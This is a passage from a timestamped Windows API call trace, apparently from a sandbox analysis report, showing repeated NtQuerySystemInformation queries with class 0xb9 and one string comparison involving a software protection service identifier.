(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x50, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x28, ResultLength=0x0) [0281.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0281.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.917] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd8, Length=0x50, ResultLength=0x0) [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0281.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8f0, Length=0x28, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x50, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x38, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.942] 